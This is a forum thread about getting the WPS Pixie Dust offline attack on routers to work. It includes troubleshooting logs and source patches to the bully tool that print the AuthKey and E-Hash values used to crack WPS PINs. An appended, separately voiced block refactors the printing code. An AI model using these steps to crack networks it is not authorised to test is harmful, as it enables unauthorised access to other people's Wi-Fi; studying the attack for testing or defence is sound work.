
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #1
    Quote Originally Posted by Lisa Chu:
    You need to edit the file and put in your own data. I don't know where the PKR, PKE data is in the packets, that's where I'm stuck.

    Tried the tool and it is giving me
    Code:
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    But I'm trying against Broadcom and not Ralink; as said above, Broadcom is not implemented yet.

    I hope you guys keep developing this subject, it's very interesting but beyond my personal understanding to put into practice, so I'll have to wait.
    Would it be feasible to add an import-from-cap feature? I guess that would get some testers running. Thanks everyone
    Tried the tool also and it is only giving the same results, but I am trying against a Ralink TP-Link router. Unmodified code does the same.
    Looking through the Wireshark logs, it is attempting to authenticate, but the script isn't recognizing that it is getting a response. I don't really
    know enough about Python to dig into it, more of a Perl guy than Python. Starting to learn it though. Trying to extract the part in wpscrack.py
    that creates the authkey and feed it what it wants to spit out the authkey, if that's even going to work... From what I am reading about the
    KDK it only partially makes sense to me.

    Tried the modified version of bully also, it just seems to run normally, trying pins and moving on to the next. Still confused on how this is
    supposed to give the Authkey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
    the authkey?

    I can get everything else as it's in plain sight. I have a couple of Ralink routers at my disposal to test this on also.

    Code:
    maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')
    I thought it wasn't obtained from Wireshark and you had to run it through the KDK... That just confused me even more...

  2. #2
    WPSCrack.py I guess only works with Atheros wireless adapters. Try this to get more info; it comes from Hack Forums:

    Code:
    int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG
    
    2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish):
    - Download the zip file. Unzip it.
    - Go to bully-master/src/wps and open wps_common.c with a text editor.
    - Go to line 122 and add something similar (just a print):
    Code:
        os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN,
              WPS_EMSK_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > AuthKey: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
            printf("%02x", *(wps->authkey + pixiecnt));
            if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey",
    
    - Now open wps_registrar.c.
    - Go to line 1719 (inside wps_process_e_hash1 function) and add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash1: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash1 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    
    - Then in the function below (inside wps_process_e_hash2) add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash2: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash2 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    Then please post this here:

    Code:
    AP Manufacturer:
    Model name/number:
    Chipset: 
    
    N1 Nonce: 
    Authkey: 
    PKE: 
    PKR: 
    E-Hash1: 
    E-Hash2:
    First 3 are optional, last 6 are mandatory to crack.
    Last edited by soxrok2212; 2015-03-26 at 21:20.
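    The three printf loops in the post above are the same byte-to-hex routine pasted into three places. As an added example (not code from this thread, and not from bully or wpa_supplicant), here is that routine pulled out into one bounds-checked function, `format_hex_colon`, plus a `print_hex_field` wrapper that produces the same " > Label: aa:bb:..." line; both names are hypothetical, and the sample bytes are constructed, not a real key. Writing into a caller-supplied buffer instead of printing directly is what makes the output checkable in a test, and the size check means a wrong length constant fails loudly instead of overrunning the buffer.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Added example, not code from the thread or from bully/wpa_supplicant.
 * Formats `len` bytes from `buf` as colon-separated lowercase hex into
 * `out` (capacity `out_size`), the same layout the printf loops in the
 * post produce. Returns the number of characters written (excluding the
 * terminating NUL), or -1 if `out` is too small. */
int format_hex_colon(const unsigned char *buf, size_t len,
                     char *out, size_t out_size)
{
    /* each byte needs 2 hex chars, one ':' between bytes, plus the NUL:
     * 2*len + (len-1) + 1 = 3*len; an empty input still needs the NUL */
    size_t needed = (len == 0) ? 1 : len * 3;
    if (out == NULL || out_size < needed)
        return -1;

    size_t pos = 0;
    for (size_t i = 0; i < len; i++) {
        if (i != 0)
            out[pos++] = ':';
        /* snprintf always has room here because of the check above */
        pos += (size_t)snprintf(out + pos, out_size - pos, "%02x", buf[i]);
    }
    out[pos] = '\0';
    return (int)pos;
}

/* Convenience wrapper mirroring the " > AuthKey: aa:bb:..." debug lines.
 * Returns 0 on success, -1 if the field did not fit. */
int print_hex_field(const char *label, const unsigned char *buf, size_t len)
{
    char tmp[3 * 64]; /* room for fields up to 64 bytes; WPS hashes are 32 */
    if (format_hex_colon(buf, len, tmp, sizeof tmp) < 0)
        return -1;
    printf(" > %s: %s\n", label, tmp);
    return 0;
}

int main(void)
{
    /* constructed sample bytes for illustration, not a real key */
    const unsigned char sample[4] = {0x00, 0x1a, 0xff, 0x7b};
    return print_hex_field("Sample", sample, sizeof sample) == 0 ? 0 : 1;
}
```

    Running it prints " > Sample: 00:1a:ff:7b". In the patched source the three loops would become single calls such as print_hex_field("AuthKey", wps->authkey, WPS_AUTHKEY_LEN), with the length constant taken from the header rather than retyped.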
